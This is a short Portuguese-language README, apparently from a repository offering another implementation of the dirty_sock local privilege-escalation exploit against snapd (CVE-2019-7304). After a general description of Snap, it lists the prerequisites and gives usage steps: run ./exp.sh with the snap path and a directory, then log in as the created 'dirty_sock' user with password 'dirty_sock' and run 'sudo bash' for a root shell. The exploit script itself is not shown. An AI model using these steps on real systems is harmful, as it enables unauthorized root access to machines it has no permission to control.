
Outra implementação para exploit de escalonamento de privilégios no Linux via snap(d) (CVE-2019-7304)
Outra implementação para exploit de escalação de privilégio no Linux via snap(d) (CVE-2019-7304)
Snap é um sistema de empacotamento e implantação de software desenvolvido pela Canonical para os sistemas operacionais que usam o kernel Linux. Os pacotes, chamados snaps, e a ferramenta para usá-los, snapd, funcionam em uma variedade de distribuições Linux e permitem que desenvolvedores de software upstream distribuam suas aplicações diretamente aos usuários. Snaps são aplicações autocontidas executando em uma sandbox com acesso mediado ao sistema hospedeiro. O Snap foi originalmente lançado para aplicações em nuvem[1] mas posteriormente foi portado para funcionar em dispositivos de Internet das Coisas[3][4] e também em aplicações de desktop[6].
dirty_sock: Escalação de Privilégio no Linux (via snapd)
- snap instalado no sistema
- você possui sudo com ou sem senha no snap
./exp.sh "snap_path" "pwd"
ex:
./exp.sh "/usr/bin/snap" "/home/evil"
então você pode usar
su - dirty_sock
dirty_sock (as password)
sudo bash